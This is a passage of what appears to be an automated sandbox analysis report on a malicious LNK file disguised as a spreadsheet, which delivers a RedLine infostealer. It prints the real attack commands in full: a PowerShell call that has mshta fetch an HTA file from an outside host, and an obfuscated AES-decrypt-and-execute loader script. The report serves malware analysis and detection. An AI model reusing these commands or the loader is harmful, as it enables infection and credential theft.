Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29CB15FC 25_2_29CB15FC
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29CB15F0 25_2_29CB15F0
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29FE0990 25_2_29FE0990
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 25_2_29FE5168 25_2_29FE5168
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\bwsiuvcU.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
Source: Joe Sandbox View Dropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: String function: 0040D606 appears 72 times
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: String function: 0040E1D8 appears 132 times
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: String function: 028A6658 appears 32 times
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: String function: 028A4698 appears 156 times
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Code function: String function: 028A4824 appears 629 times
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: String function: 029844A0 appears 67 times
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: String function: 02986658 appears 32 times
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: String function: 02984824 appears 883 times
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: String function: 02997BE8 appears 45 times
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: String function: 02984698 appears 247 times
Source: netutils.dll.19.dr Static PE information: Number of sections : 19 > 10
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: amsi64_7800.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: powershell.exe PID: 7688, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7800, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\Public\Libraries\UcvuiswbO.bat, type: DROPPED Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winLNK@26/26@5/4
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02987F90 GetDiskFreeSpaceA, 19_2_02987F90
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 23_2_004019F0
Source: C:\Users\user\AppData\Roaming\uc.exe Code function: 19_2_02996D84 CoCreateInstance, 19_2_02996D84
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Code function: 23_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 23_2_004019F0
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\yt[1].hta
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bx55tq2v.0tl.ps1
Source: C:\Users\user\AppData\Roaming\uc.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Command line argument: 08A 23_2_00413780
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Command line argument: 08A 23_2_00413780
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Command line argument: 08A 23_1_00413780
Source: C:\Users\Public\Libraries\bwsiuvcU.pif Command line argument: 08A 25_2_00413780
Source: C:\Users\user\AppData\Roaming\uc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\uc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\Public\Libraries\bwsiuvcU.pif WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: FT. 40FE CNY .xlsx.lnk ReversingLabs: Detection: 31%
Source: FT. 40FE CNY .xlsx.lnk Virustotal: Detection: 24%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"
Source: C:\Users\user\AppData\Roaming\uc.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\uc.exe Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
Source: C:\Users\user\AppData\Roaming\uc.exe Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: unknown Process created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: unknown Process created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"
Source: C:\Users\user\AppData\Roaming\uc.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
Source: C:\Users\user\AppData\Roaming\uc.exe Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
Source: C:\Users\user\AppData\Roaming\uc.exe Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
